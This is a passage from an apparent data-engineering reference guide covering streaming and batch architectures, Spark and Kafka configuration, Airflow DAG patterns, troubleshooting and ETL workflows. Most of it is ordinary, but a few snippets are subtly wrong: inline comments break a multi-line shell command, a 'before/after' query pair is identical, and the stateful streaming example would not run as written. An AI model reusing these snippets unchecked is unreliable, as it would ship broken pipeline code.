│ (Spark/Airflow) │ │ (Flink/Spark SS) │
└─────────────┬─────┘ └───────┬─────────────┘
│ │
┌─────────────▼─────┐ ┌───────▼─────────────┐
│ Master Dataset │ │ Real-time Views │
│ (Data Lake) │ │ (Redis/Druid) │
└─────────────┬─────┘ └───────┬─────────────┘
│ │
┌───────▼─────────────────▼───────┐
│ Serving Layer │
│ (Merged Batch + Real-time) │
└─────────────────────────────────┘
```
**Components:**
1. **Batch Layer**
- Processes complete historical data
- Creates precomputed batch views
- Handles complex transformations, ML training
- Reprocessable from raw data
2. **Speed Layer**
- Processes real-time data stream
- Creates real-time views for recent data
- Low latency, simpler transformations
- Compensates for batch layer delay
3. **Serving Layer**
- Merges batch and real-time views
- Responds to queries
- Provides unified interface
**Implementation Example:**
```python
# Batch layer: Daily aggregation with Spark
def batch_daily_aggregation(spark, date):
"""Process full day of data for batch views."""
raw_df = spark.read.parquet(f"s3://data-lake/raw/events/date={date}")
aggregated = raw_df.groupBy("user_id", "event_type") \
.agg(
count("*").alias("event_count"),
sum("revenue").alias("total_revenue"),
max("timestamp").alias("last_event")
)
aggregated.write \
.mode("overwrite") \
.partitionBy("event_type") \
.parquet(f"s3://data-lake/batch-views/daily_agg/date={date}")
# Speed layer: Real-time aggregation with Spark Structured Streaming
def speed_realtime_aggregation(spark):
"""Process streaming data for real-time views."""
stream_df = spark.readStream \
.format("kafka") \
.option("kafka.bootstrap.servers", "kafka:9092") \
.option("subscribe", "events") \
.load()
parsed = stream_df.select(
from_json(col("value").cast("string"), event_schema).alias("data")
).select("data.*")
aggregated = parsed \
.withWatermark("timestamp", "5 minutes") \
.groupBy(
window("timestamp", "1 minute"),
"user_id",
"event_type"
) \
.agg(count("*").alias("event_count"))
query = aggregated.writeStream \
.format("redis") \
.option("host", "redis") \
.outputMode("update") \
.start()
return query
```
### Kappa Architecture
Kappa simplifies Lambda by using only stream processing with replay capability.
```
┌─────────────────────────────────────┐
│ Data Sources │
└─────────────────┬───────────────────┘
│
┌─────────────────▼───────────────────┐
│ Immutable Log (Kafka/Kinesis) │
│ (Long retention) │
└─────────────────┬───────────────────┘
│
┌─────────────────▼───────────────────┐
│ Stream Processor │
│ (Flink/Spark Streaming) │
└─────────────────┬───────────────────┘
│
┌─────────────────▼───────────────────┐
│ Serving Layer │
│ (Database/Data Warehouse) │
└─────────────────────────────────────┘
```
**Key Principles:**
1. **Single Processing Path**: All data processed as streams
2. **Immutable Log**: Kafka/Kinesis as source of truth with long retention
3. **Reprocessing via Replay**: Re-run stream processor from beginning when needed
**Reprocessing Strategy:**
```python
# Reprocessing in Kappa architecture
class KappaReprocessor:
"""Handle reprocessing by replaying from Kafka."""
def __init__(self, kafka_config, flink_job):
self.kafka = kafka_config
self.job = flink_job
def reprocess(self, from_timestamp: str):
"""Reprocess all data from a specific timestamp."""
# 1. Start new consumer group reading from timestamp
new_consumer_group = f"reprocess-{uuid.uuid4()}"
# 2. Configure stream processor with new group
self.job.set_config({
"group.id": new_consumer_group,
"auto.offset.reset": "none" # We'll set offset manually
})
# 3. Seek to timestamp
offsets = self._get_offsets_for_timestamp(from_timestamp)
self.job.seek_to_offsets(offsets)
# 4. Write to new output table/topic
output_table = f"events_reprocessed_{datetime.now().strftime('%Y%m%d')}"
self.job.set_output(output_table)
# 5. Run until caught up
self.job.run_until_caught_up()
# 6. Swap output tables atomically
self._atomic_table_swap("events", output_table)
def _get_offsets_for_timestamp(self, timestamp):
"""Get Kafka offsets for a specific timestamp."""
consumer = KafkaConsumer(bootstrap_servers=self.kafka["brokers"])
partitions = consumer.partitions_for_topic("events")
offsets = {}
for partition in partitions:
tp = TopicPartition("events", partition)
offset = consumer.offsets_for_times({tp: timestamp})
offsets[tp] = offset[tp].offset
return offsets
```
### Medallion Architecture (Bronze/Silver/Gold)
Common in data lakehouses (Databricks, Delta Lake).
```
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Bronze │────▶│ Silver │────▶│ Gold │
│ (Raw Data) │ │ (Cleansed) │ │ (Analytics) │
└─────────────┘ └─────────────┘ └─────────────┘
│ │ │
▼ ▼ ▼
Landing zone Validated, Aggregated,
Append-only deduplicated, business-ready
Schema evolution standardized Star schema
```
**Implementation with Delta Lake:**
```python
# Bronze: Raw ingestion
def ingest_to_bronze(spark, source_path, bronze_path):
"""Ingest raw data to bronze layer."""
df = spark.read.format("json").load(source_path)
# Add metadata
df = df.withColumn("_ingested_at", current_timestamp()) \
.withColumn("_source_file", input_file_name())
df.write \
.format("delta") \
.mode("append") \
.option("mergeSchema", "true") \
.save(bronze_path)
# Silver: Cleansing and validation
def bronze_to_silver(spark, bronze_path, silver_path):
"""Transform bronze to silver with cleansing."""
bronze_df = spark.read.format("delta").load(bronze_path)
# Read last processed version
last_version = get_last_processed_version(silver_path, "bronze")
# Get only new records
new_records = bronze_df.filter(col("_commit_version") > last_version)
# Cleanse and validate
silver_df = new_records \
.filter(col("user_id").isNotNull()) \
.filter(col("event_type").isin(["click", "view", "purchase"])) \
.withColumn("event_date", to_date("timestamp")) \
.dropDuplicates(["event_id"])
# Merge to silver (upsert)
silver_table = DeltaTable.forPath(spark, silver_path)
silver_table.alias("target") \
.merge(
silver_df.alias("source"),
"target.event_id = source.event_id"
) \
.whenMatchedUpdateAll() \
.whenNotMatchedInsertAll() \
.execute()
# Gold: Business aggregations
def silver_to_gold(spark, silver_path, gold_path):
"""Create business-ready aggregations in gold layer."""
silver_df = spark.read.format("delta").load(silver_path)
# Daily user metrics
daily_metrics = silver_df \
.groupBy("user_id", "event_date") \
.agg(
count("*").alias("total_events"),
countDistinct("session_id").alias("sessions"),
sum(when(col("event_type") == "purchase", col("revenue")).otherwise(0)).alias("revenue"),
max("timestamp").alias("last_activity")
)
# Write as gold table
daily_metrics.write \
.format("delta") \
.mode("overwrite") \
.partitionBy("event_date") \
.save(gold_path + "/daily_user_metrics")
```
---
## Batch Processing
### Apache Spark Best Practices
#### Memory Management
```python
# Optimal Spark configuration for batch jobs
spark = SparkSession.builder \
.appName("BatchETL") \
.config("spark.executor.memory", "8g") \
.config("spark.executor.cores", "4") \
.config("spark.driver.memory", "4g") \
.config("spark.sql.shuffle.partitions", "200") \
.config("spark.sql.adaptive.enabled", "true") \
.config("spark.sql.adaptive.coalescePartitions.enabled", "true") \
.config("spark.serializer", "org.apache.spark.serializer.KryoSerializer") \
.getOrCreate()
```
**Memory Tuning Guidelines:**
| Data Size | Executors | Memory/Executor | Cores/Executor |
|-----------|-----------|-----------------|----------------|
| < 10 GB | 2-4 | 4-8 GB | 2-4 |
| 10-100 GB | 10-20 | 8-16 GB | 4-8 |
| 100+ GB | 50+ | 16-32 GB | 4-8 |
#### Partition Optimization
```python
# Repartition vs Coalesce
# Repartition: Full shuffle, use for increasing partitions
df_repartitioned = df.repartition(100, "date") # Partition by column
# Coalesce: No shuffle, use for decreasing partitions
df_coalesced = df.coalesce(10) # Reduce partitions without shuffle
# Optimal partition size: 128-256 MB each
# Calculate partitions:
# num_partitions = total_data_size_mb / 200
# Check current partitions
print(f"Current partitions: {df.rdd.getNumPartitions()}")
# Repartition for optimal join performance
large_df = large_df.repartition(200, "join_key")
small_df = small_df.repartition(200, "join_key")
result = large_df.join(small_df, "join_key")
```
#### Join Optimization
```python
# Broadcast join for small tables (< 10MB by default)
from pyspark.sql.functions import broadcast
# Explicit broadcast hint
result = large_df.join(broadcast(small_df), "key")
# Increase broadcast threshold if needed
spark.conf.set("spark.sql.autoBroadcastJoinThreshold", "100m")
# Sort-merge join for large tables
spark.conf.set("spark.sql.join.preferSortMergeJoin", "true")
# Bucket tables for frequent joins
df.write \
.bucketBy(100, "customer_id") \
.sortBy("customer_id") \
.mode("overwrite") \
.saveAsTable("bucketed_orders")
```
#### Caching Strategy
```python
# Cache when:
# 1. DataFrame is used multiple times
# 2. After expensive transformations
# 3. Before iterative operations
# Use MEMORY_AND_DISK for large datasets
from pyspark import StorageLevel
df.persist(StorageLevel.MEMORY_AND_DISK)
# Cache only necessary columns
df.select("id", "value").cache()
# Unpersist when done
df.unpersist()
# Check storage
spark.catalog.clearCache() # Clear all caches
```
### Airflow DAG Patterns
#### Idempotent Tasks
```python
# Always design idempotent tasks
from airflow.decorators import dag, task
from airflow.utils.dates import days_ago
from datetime import timedelta
@dag(
schedule_interval="@daily",
start_date=days_ago(7),
catchup=True,
default_args={
"retries": 3,
"retry_delay": timedelta(minutes=5),
}
)
def idempotent_etl():
@task
def extract(execution_date=None):
"""Idempotent extraction - same date always returns same data."""
date_str = execution_date.strftime("%Y-%m-%d")
# Query for specific date only
query = f"""
SELECT * FROM source_table
WHERE DATE(created_at) = '{date_str}'
"""
return query_database(query)
@task
def transform(data):
"""Pure function - no side effects."""
return [transform_record(r) for r in data]
@task
def load(data, execution_date=None):
"""Idempotent load - delete before insert or use MERGE."""
date_str = execution_date.strftime("%Y-%m-%d")
# Option 1: Delete and reinsert
execute_sql(f"DELETE FROM target WHERE date = '{date_str}'")
insert_data(data)
# Option 2: Use MERGE/UPSERT
# MERGE INTO target USING source ON target.id = source.id
# WHEN MATCHED THEN UPDATE
# WHEN NOT MATCHED THEN INSERT
raw = extract()
transformed = transform(raw)
load(transformed)
dag = idempotent_etl()
```
#### Backfill Pattern
```python
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow.utils.dates import days_ago
from datetime import datetime, timedelta
def process_date(ds, **kwargs):
"""Process a single date - supports backfill."""
logical_date = datetime.strptime(ds, "%Y-%m-%d")
# Always process specific date, not "latest"
data = extract_for_date(logical_date)
transformed = transform(data)
# Use partition/date-specific target
load_to_partition(transformed, partition=ds)
with DAG(
"backfillable_etl",
schedule_interval="@daily",
start_date=datetime(2024, 1, 1),
catchup=True, # Enable backfill
max_active_runs=3, # Limit parallel backfills
) as dag:
process = PythonOperator(
task_id="process",
python_callable=process_date,
provide_context=True,
)
# Backfill command:
# airflow dags backfill -s 2024-01-01 -e 2024-01-31 backfillable_etl
```
---
## Stream Processing
### Apache Kafka Architecture
#### Topic Design
```bash
# Create topic with proper configuration
kafka-topics.sh --create \
--bootstrap-server localhost:9092 \
--topic user-events \
--partitions 24 \
--replication-factor 3 \
--config retention.ms=604800000 \ # 7 days
--config retention.bytes=107374182400 \ # 100GB
--config cleanup.policy=delete \
--config min.insync.replicas=2 \ # Durability
--config segment.bytes=1073741824 # 1GB segments
```
**Partition Count Guidelines:**
| Throughput | Partitions | Notes |
|------------|------------|-------|
| < 10K msg/s | 6-12 | Single consumer can handle |
| 10K-100K msg/s | 24-48 | Multiple consumers needed |
| > 100K msg/s | 100+ | Scale consumers with partitions |
**Partition Key Selection:**
```python
# Good partition keys: Even distribution, related data together
# For user events: user_id (events for same user on same partition)
# For orders: order_id (if no ordering needed) or customer_id (if needed)
from kafka import KafkaProducer
import json
producer = KafkaProducer(
bootstrap_servers=['localhost:9092'],
value_serializer=lambda v: json.dumps(v).encode('utf-8'),
key_serializer=lambda k: k.encode('utf-8')
)
def send_event(event):
# Use user_id as key for user-based partitioning
producer.send(
topic='user-events',
key=event['user_id'], # Partition key
value=event
)
```
### Spark Structured Streaming
#### Watermarks and Late Data
```python
from pyspark.sql.functions import window, col
# Read stream
events = spark.readStream \
.format("kafka") \
.option("kafka.bootstrap.servers", "localhost:9092") \
.option("subscribe", "events") \
.load() \
.select(from_json(col("value").cast("string"), schema).alias("data")) \
.select("data.*")
# Add watermark for late data handling
# Data arriving more than 10 minutes late will be dropped
windowed_counts = events \
.withWatermark("event_time", "10 minutes") \
.groupBy(
window("event_time", "5 minutes", "1 minute"), # 5-min windows, 1-min slide
"event_type"
) \
.count()
# Write with append mode (only final results for complete windows)
query = windowed_counts.writeStream \
.format("delta") \
.outputMode("append") \
.option("checkpointLocation", "/checkpoints/windowed_counts") \
.start()
```
**Watermark Behavior:**
```
Timeline: ─────────────────────────────────────────▶
Events: E1 E2 E3 E4(late) E5
│ │ │ │ │
Time: 10:00 10:02 10:05 10:03 10:15
▲ ▲
│ │
Current Arrives at 10:15
watermark but event_time=10:03
= max_event_time
- threshold
= 10:05 - 10min If watermark > event_time:
= 9:55 Event is dropped (too late)
```
#### Stateful Operations
```python
from pyspark.sql.functions import pandas_udf, PandasUDFType
from pyspark.sql.streaming.state import GroupState, GroupStateTimeout
# Session windows using flatMapGroupsWithState
def session_aggregation(key, events, state):
"""Aggregate events into sessions with 30-minute timeout."""
# Get or initialize state
if state.exists:
session = state.get
else:
session = {"start": None, "events": [], "total": 0}
# Process new events
for event in events:
if session["start"] is None:
session["start"] = event.timestamp
session["events"].append(event)
session["total"] += event.value
# Set timeout (session expires after 30 min of inactivity)
state.setTimeoutDuration("30 minutes")
# Check if session should close
if state.hasTimedOut():
# Emit completed session
output = {
"user_id": key,
"session_start": session["start"],
"event_count": len(session["events"]),
"total_value": session["total"]
}
state.remove()
yield output
else:
# Update state
state.update(session)
# Apply stateful operation
sessions = events \
.groupByKey(lambda e: e.user_id) \
.flatMapGroupsWithState(
session_aggregation,
outputMode="append",
stateTimeout=GroupStateTimeout.ProcessingTimeTimeout()
)
```
---
## Exactly-Once Semantics
### Producer Idempotence
```python
from kafka import KafkaProducer
# Enable idempotent producer
producer = KafkaProducer(
bootstrap_servers=['localhost:9092'],
acks='all', # Wait for all replicas
enable_idempotence=True, # Exactly-once per partition
max_in_flight_requests_per_connection=5, # Max with idempotence
retries=2147483647, # Infinite retries
value_serializer=lambda v: json.dumps(v).encode('utf-8')
)
# Producer will deduplicate based on sequence numbers
for i in range(100):
producer.send('topic', {'id': i, 'data': 'value'})
producer.flush()
```
### Transactional Processing
```python
from kafka import KafkaProducer, KafkaConsumer
from kafka.errors import KafkaError
# Transactional producer
producer = KafkaProducer(
bootstrap_servers=['localhost:9092'],
transactional_id='my-transactional-id', # Enable transactions
enable_idempotence=True,
acks='all'
)
producer.init_transactions()
def process_with_transactions(consumer, producer):
"""Read-process-write with exactly-once semantics."""
try:
producer.begin_transaction()
# Read
records = consumer.poll(timeout_ms=1000)
for tp, messages in records.items():
for message in messages:
# Process
result = transform(message.value)
# Write to output topic
producer.send('output-topic', result)
# Commit offsets and transaction atomically
producer.send_offsets_to_transaction(
consumer.position(consumer.assignment()),
consumer.group_id
)
producer.commit_transaction()
except KafkaError as e:
producer.abort_transaction()
raise
```
### Spark Exactly-Once to External Systems
```python
# Use foreachBatch with idempotent writes
def write_to_database_idempotent(batch_df, batch_id):
"""Write batch with exactly-once semantics."""
# Add batch_id for deduplication
batch_with_id = batch_df.withColumn("batch_id", lit(batch_id))
# Use MERGE for idempotent writes
batch_with_id.write \
.format("jdbc") \
.option("url", "jdbc:postgresql://localhost/db") \
.option("dbtable", "staging_events") \
.option("driver", "org.postgresql.Driver") \
.mode("append") \
.save()
# Merge staging to final (idempotent)
execute_sql("""
MERGE INTO events AS target
USING staging_events AS source
ON target.event_id = source.event_id
WHEN MATCHED THEN UPDATE SET *
WHEN NOT MATCHED THEN INSERT *
""")
# Clean staging
execute_sql("TRUNCATE staging_events")
query = events.writeStream \
.foreachBatch(write_to_database_idempotent) \
.option("checkpointLocation", "/checkpoints/to-postgres") \
.start()
```
---
## Error Handling
### Dead Letter Queue (DLQ)
```python
class DeadLetterQueue:
"""Handle failed records with dead letter queue pattern."""
def __init__(self, dlq_topic: str, producer: KafkaProducer):
self.dlq_topic = dlq_topic
self.producer = producer
def send_to_dlq(self, record, error: Exception, context: dict):
"""Send failed record to DLQ with error metadata."""
dlq_record = {
"original_record": record,
"error_type": type(error).__name__,
"error_message": str(error),
"timestamp": datetime.utcnow().isoformat(),
"context": context,
"retry_count": context.get("retry_count", 0)
}
self.producer.send(
self.dlq_topic,
value=json.dumps(dlq_record).encode('utf-8')
)
def process_with_dlq(consumer, processor, dlq):
"""Process records with DLQ for failures."""
for message in consumer:
try:
result = processor.process(message.value)
# Success - commit offset
consumer.commit()
except ValidationError as e:
# Non-retryable - send to DLQ immediately
dlq.send_to_dlq(
message.value,
e,
{"topic": message.topic, "partition": message.partition}
)
consumer.commit() # Don't retry
except TemporaryError as e:
# Retryable - don't commit, let consumer retry
# After max retries, send to DLQ
retry_count = message.headers.get("retry_count", 0)
if retry_count >= MAX_RETRIES:
dlq.send_to_dlq(message.value, e, {"retry_count": retry_count})
consumer.commit()
else:
raise # Will be retried
```
### Circuit Breaker
```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from enum import Enum
import threading
class CircuitState(Enum):
CLOSED = "closed" # Normal operation
OPEN = "open" # Failing, reject calls
HALF_OPEN = "half_open" # Testing if recovered
@dataclass
class CircuitBreaker:
"""Circuit breaker for external service calls."""
failure_threshold: int = 5
recovery_timeout: timedelta = timedelta(seconds=30)
success_threshold: int = 3
def __post_init__(self):
self.state = CircuitState.CLOSED
self.failure_count = 0
self.success_count = 0
self.last_failure_time = None
self.lock = threading.Lock()
def call(self, func, *args, **kwargs):
"""Execute function with circuit breaker protection."""
with self.lock:
if self.state == CircuitState.OPEN:
if self._should_attempt_reset():
self.state = CircuitState.HALF_OPEN
else:
raise CircuitOpenError("Circuit is open")
try:
result = func(*args, **kwargs)
self._record_success()
return result
except Exception as e:
self._record_failure()
raise
def _record_success(self):
with self.lock:
if self.state == CircuitState.HALF_OPEN:
self.success_count += 1
if self.success_count >= self.success_threshold:
self.state = CircuitState.CLOSED
self.failure_count = 0
self.success_count = 0
elif self.state == CircuitState.CLOSED:
self.failure_count = 0
def _record_failure(self):
with self.lock:
self.failure_count += 1
self.last_failure_time = datetime.now()
if self.state == CircuitState.HALF_OPEN:
self.state = CircuitState.OPEN
self.success_count = 0
elif self.failure_count >= self.failure_threshold:
self.state = CircuitState.OPEN
def _should_attempt_reset(self):
if self.last_failure_time is None:
return True
return datetime.now() - self.last_failure_time >= self.recovery_timeout
# Usage
circuit = CircuitBreaker(failure_threshold=5, recovery_timeout=timedelta(seconds=60))
def call_external_api(data):
return circuit.call(external_api.process, data)
```
---
## Data Ingestion Patterns
### Change Data Capture (CDC)
```python
# Using Debezium with Kafka Connect
# connector-config.json
{
"name": "postgres-cdc-connector",
"config": {
"connector.class": "io.debezium.connector.postgresql.PostgresConnector",
"database.hostname": "postgres",
"database.port": "5432",
"database.user": "debezium",
"database.password": "password",
"database.dbname": "source_db",
"database.server.name": "source",
"table.include.list": "public.orders,public.customers",
"plugin.name": "pgoutput",
"publication.name": "dbz_publication",
"slot.name": "debezium_slot",
"transforms": "unwrap",
"transforms.unwrap.type": "io.debezium.transforms.ExtractNewRecordState",
"transforms.unwrap.drop.tombstones": "false"
}
}
```
**Processing CDC Events:**
```python
def process_cdc_event(event):
"""Process Debezium CDC event."""
operation = event.get("op")
if operation == "c": # Create (INSERT)
after = event.get("after")
return {"action": "insert", "data": after}
elif operation == "u": # Update
before = event.get("before")
after = event.get("after")
return {"action": "update", "before": before, "after": after}
elif operation == "d": # Delete
before = event.get("before")
return {"action": "delete", "data": before}
elif operation == "r": # Read (snapshot)
after = event.get("after")
return {"action": "snapshot", "data": after}
```
### Bulk Ingestion
```python
# Efficient bulk loading to data warehouse
from concurrent.futures import ThreadPoolExecutor
import boto3
class BulkIngester:
"""Bulk ingest data to Snowflake via S3."""
def __init__(self, s3_bucket: str, snowflake_conn):
self.s3 = boto3.client('s3')
self.bucket = s3_bucket
self.snowflake = snowflake_conn
def ingest_dataframe(self, df, table_name: str, mode: str = "append"):
"""Bulk ingest DataFrame to Snowflake."""
# 1. Write to S3 as Parquet (compressed, columnar)
s3_path = f"s3://{self.bucket}/staging/{table_name}/{uuid.uuid4()}"
df.write.parquet(s3_path)
# 2. Create external stage if not exists
self.snowflake.execute(f"""
CREATE STAGE IF NOT EXISTS {table_name}_stage
URL = '{s3_path}'
CREDENTIALS = (AWS_KEY_ID='...' AWS_SECRET_KEY='...')
FILE_FORMAT = (TYPE = 'PARQUET')
""")
# 3. COPY INTO (much faster than INSERT)
if mode == "overwrite":
self.snowflake.execute(f"TRUNCATE TABLE {table_name}")
self.snowflake.execute(f"""
COPY INTO {table_name}
FROM @{table_name}_stage
FILE_FORMAT = (TYPE = 'PARQUET')
MATCH_BY_COLUMN_NAME = CASE_INSENSITIVE
ON_ERROR = 'CONTINUE'
""")
# 4. Cleanup staging files
self._cleanup_s3(s3_path)
```
---
## Orchestration
### Dependency Management
```python
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow.sensors.external_task import ExternalTaskSensor
from airflow.utils.task_group import TaskGroup
from datetime import timedelta
with DAG("complex_pipeline") as dag:
# Wait for upstream DAG
wait_for_source = ExternalTaskSensor(
task_id="wait_for_source_etl",
external_dag_id="source_etl_dag",
external_task_id="final_task",
execution_delta=timedelta(hours=0),
timeout=3600,
mode="poke",
poke_interval=60,
)
# Parallel extraction group
with TaskGroup("extract") as extract_group:
extract_orders = PythonOperator(
task_id="extract_orders",
python_callable=extract_orders_func,
)
extract_customers = PythonOperator(
task_id="extract_customers",
python_callable=extract_customers_func,
)
extract_products = PythonOperator(
task_id="extract_products",
python_callable=extract_products_func,
)
# Sequential transformation
with TaskGroup("transform") as transform_group:
join_data = PythonOperator(
task_id="join_data",
python_callable=join_func,
)
aggregate = PythonOperator(
task_id="aggregate",
python_callable=aggregate_func,
)
join_data >> aggregate
# Load
load = PythonOperator(
task_id="load",
python_callable=load_func,
)
# Define dependencies
wait_for_source >> extract_group >> transform_group >> load
```
### Dynamic DAG Generation
```python
from airflow import DAG
from airflow.operators.python import PythonOperator
from datetime import datetime
import yaml
def create_etl_dag(config: dict) -> DAG:
"""Factory function to create ETL DAGs from config."""
dag = DAG(
dag_id=f"etl_{config['source']}_{config['destination']}",
schedule_interval=config.get('schedule', '@daily'),
start_date=datetime(2024, 1, 1),
catchup=False,
tags=['etl', 'auto-generated'],
)
with dag:
extract = PythonOperator(
task_id='extract',
python_callable=create_extract_func(config['source']),
)
transform = PythonOperator(
task_id='transform',
python_callable=create_transform_func(config['transformations']),
)
load = PythonOperator(
task_id='load',
python_callable=create_load_func(config['destination']),
)
extract >> transform >> load
return dag
# Load configurations
with open('/config/etl_pipelines.yaml') as f:
configs = yaml.safe_load(f)
# Generate DAGs
for config in configs['pipelines']:
dag_id = f"etl_{config['source']}_{config['destination']}"
globals()[dag_id] = create_etl_dag(config)
```
FILE:references/troubleshooting.md
# senior-data-engineer reference
## Troubleshooting
### Pipeline Failures
**Symptom:** Airflow DAG fails with timeout
```
Task exceeded max execution time
```
**Solution:**
1. Check resource allocation
2. Profile slow operations
3. Add incremental processing
```python
# Increase timeout
default_args = {
'execution_timeout': timedelta(hours=2),
}
# Or use incremental loads
WHERE updated_at > '{{ prev_ds }}'
```
---
**Symptom:** Spark job OOM
```
java.lang.OutOfMemoryError: Java heap space
```
**Solution:**
1. Increase executor memory
2. Reduce partition size
3. Use disk spill
```python
spark.conf.set("spark.executor.memory", "8g")
spark.conf.set("spark.sql.shuffle.partitions", "200")
spark.conf.set("spark.memory.fraction", "0.8")
```
---
**Symptom:** Kafka consumer lag increasing
```
Consumer lag: 1000000 messages
```
**Solution:**
1. Increase consumer parallelism
2. Optimize processing logic
3. Scale consumer group
```bash
# Add more partitions
kafka-topics.sh --alter \
--bootstrap-server localhost:9092 \
--topic user-events \
--partitions 24
```
---
### Data Quality Issues
**Symptom:** Duplicate records appearing
```
Expected unique, found 150 duplicates
```
**Solution:**
1. Add deduplication logic
2. Use merge/upsert operations
```sql
-- dbt incremental with dedup
{{
config(
materialized='incremental',
unique_key='order_id'
)
}}
SELECT * FROM (
SELECT
*,
ROW_NUMBER() OVER (
PARTITION BY order_id
ORDER BY updated_at DESC
) as rn
FROM {{ source('raw', 'orders') }}
) WHERE rn = 1
```
---
**Symptom:** Stale data in tables
```
Last update: 3 days ago
```
**Solution:**
1. Check upstream pipeline status
2. Verify source availability
3. Add freshness monitoring
```yaml
# dbt freshness check
sources:
- name: "raw"
freshness:
warn_after: {count: 12, period: hour}
error_after: {count: 24, period: hour}
loaded_at_field: _loaded_at
```
---
**Symptom:** Schema drift detected
```
Column 'new_field' not in expected schema
```
**Solution:**
1. Update data contract
2. Modify transformations
3. Communicate with producers
```python
# Handle schema evolution
df = spark.read.format("delta") \
.option("mergeSchema", "true") \
.load("/data/orders")
```
---
### Performance Issues
**Symptom:** Query takes hours
```
Query runtime: 4 hours (expected: 30 minutes)
```
**Solution:**
1. Check query plan
2. Add proper partitioning
3. Optimize joins
```sql
-- Before: Full table scan
SELECT * FROM orders WHERE order_date = '2024-01-15';
-- After: Partition pruning
-- Table partitioned by order_date
SELECT * FROM orders WHERE order_date = '2024-01-15';
-- Add clustering for frequent filters
ALTER TABLE orders CLUSTER BY (customer_id);
```
---
**Symptom:** dbt model takes too long
```
Model fct_orders completed in 45 minutes
```
**Solution:**
1. Use incremental materialization
2. Reduce upstream dependencies
3. Pre-aggregate where possible
```sql
-- Convert to incremental
{{
config(
materialized='incremental',
unique_key='order_id',
on_schema_change='sync_all_columns'
)
}}
SELECT * FROM {{ ref('stg_orders') }}
{% if is_incremental() %}
WHERE _loaded_at > (SELECT MAX(_loaded_at) FROM {{ this }})
{% endif %}
```
FILE:references/workflows.md
# senior-data-engineer reference
## Workflows
### Workflow 1: Building a Batch ETL Pipeline
**Scenario:** Extract data from PostgreSQL, transform with dbt, load to Snowflake.
#### Step 1: Define Source Schema
```sql
-- Document source tables
SELECT
table_name,
column_name,
data_type,
is_nullable
FROM information_schema.columns
WHERE table_schema = 'source_schema'
ORDER BY table_name, ordinal_position;
```
#### Step 2: Generate Extraction Config
```bash
python scripts/pipeline_orchestrator.py generate \
--type airflow \
--source postgres \
--tables orders,customers,products \
--mode incremental \
--watermark updated_at \
--output dags/extract_source.py
```
#### Step 3: Create dbt Models
```sql
-- models/staging/stg_orders.sql
WITH source AS (
SELECT * FROM {{ source('postgres', 'orders') }}
),
renamed AS (
SELECT
order_id,
customer_id,
order_date,
total_amount,
status,
_extracted_at
FROM source
WHERE order_date >= DATEADD(day, -3, CURRENT_DATE)
)
SELECT * FROM renamed
```
```sql
-- models/marts/fct_orders.sql
{{
config(
materialized='incremental',
unique_key='order_id',
cluster_by=['order_date']
)
}}
SELECT
o.order_id,
o.customer_id,
c.customer_segment,
o.order_date,
o.total_amount,
o.status
FROM {{ ref('stg_orders') }} o
LEFT JOIN {{ ref('dim_customers') }} c
ON o.customer_id = c.customer_id
{% if is_incremental() %}
WHERE o._extracted_at > (SELECT MAX(_extracted_at) FROM {{ this }})
{% endif %}
```
#### Step 4: Configure Data Quality Tests
```yaml
# models/marts/schema.yml
version: 2
models:
- name: "fct-orders"
description: "Order fact table"
columns:
- name: "order-id"
tests:
- unique
- not_null
- name: "total-amount"
tests:
- not_null
- dbt_utils.accepted_range:
min_value: 0
max_value: 1000000
- name: "order-date"
tests:
- not_null
- dbt_utils.recency:
datepart: day
field: order_date
interval: 1
```
#### Step 5: Create Airflow DAG
```python
# dags/daily_etl.py
from airflow import DAG
from airflow.providers.postgres.operators.postgres import PostgresOperator
from airflow.operators.bash import BashOperator
from airflow.utils.dates import days_ago
from datetime import timedelta
default_args = {
'owner': 'data-team',
'depends_on_past': False,
'email_on_failure': True,
'email': ['data-alerts@company.com'],
'retries': 2,
'retry_delay': timedelta(minutes=5),
}
with DAG(
'daily_etl_pipeline',
default_args=default_args,
description='Daily ETL from PostgreSQL to Snowflake',
schedule_interval='0 5 * * *',
start_date=days_ago(1),
catchup=False,
tags=['etl', 'daily'],
) as dag:
extract = BashOperator(
task_id='extract_source_data',
bash_command='python /opt/airflow/scripts/extract.py --date {{ ds }}',
)
transform = BashOperator(
task_id='run_dbt_models',
bash_command='cd /opt/airflow/dbt && dbt run --select marts.*',
)
test = BashOperator(
task_id='run_dbt_tests',
bash_command='cd /opt/airflow/dbt && dbt test --select marts.*',
)
notify = BashOperator(
task_id='send_notification',
bash_command='python /opt/airflow/scripts/notify.py --status success',
trigger_rule='all_success',
)
extract >> transform >> test >> notify
```
#### Step 6: Validate Pipeline
```bash
# Test locally
dbt run --select stg_orders fct_orders
dbt test --select fct_orders
# Validate data quality
python scripts/data_quality_validator.py validate \
--table fct_orders \
--checks all \
--output reports/quality_report.json
```
---
### Workflow 2: Implementing Real-Time Streaming
**Scenario:** Stream events from Kafka, process with Flink/Spark Streaming, sink to data lake.
#### Step 1: Define Event Schema
```json
{
"$schema": "http://json-schema.org/draft-07/schema#",
"title": "UserEvent",
"type": "object",
"required": ["event_id", "user_id", "event_type", "timestamp"],
"properties": {
"event_id": {"type": "string", "format": "uuid"},
"user_id": {"type": "string"},
"event_type": {"type": "string", "enum": ["page_view", "click", "purchase"]},
"timestamp": {"type": "string", "format": "date-time"},
"properties": {"type": "object"}
}
}
```
#### Step 2: Create Kafka Topic
```bash
# Create topic with appropriate partitions
kafka-topics.sh --create \
--bootstrap-server localhost:9092 \
--topic user-events \
--partitions 12 \
--replication-factor 3 \
--config retention.ms=604800000 \
--config cleanup.policy=delete
# Verify topic
kafka-topics.sh --describe \
--bootstrap-server localhost:9092 \
--topic user-events
```
#### Step 3: Implement Spark Streaming Job
```python
# streaming/user_events_processor.py
from pyspark.sql import SparkSession
from pyspark.sql.functions import (
from_json, col, window, count, avg,
to_timestamp, current_timestamp
)
from pyspark.sql.types import (
StructType, StructField, StringType,
TimestampType, MapType
)
# Initialize Spark
spark = SparkSession.builder \
.appName("UserEventsProcessor") \
.config("spark.sql.streaming.checkpointLocation", "/checkpoints/user-events") \
.config("spark.sql.shuffle.partitions", "12") \
.getOrCreate()
# Define schema
event_schema = StructType([
StructField("event_id", StringType(), False),
StructField("user_id", StringType(), False),
StructField("event_type", StringType(), False),
StructField("timestamp", StringType(), False),
StructField("properties", MapType(StringType(), StringType()), True)
])
# Read from Kafka
events_df = spark.readStream \
.format("kafka") \
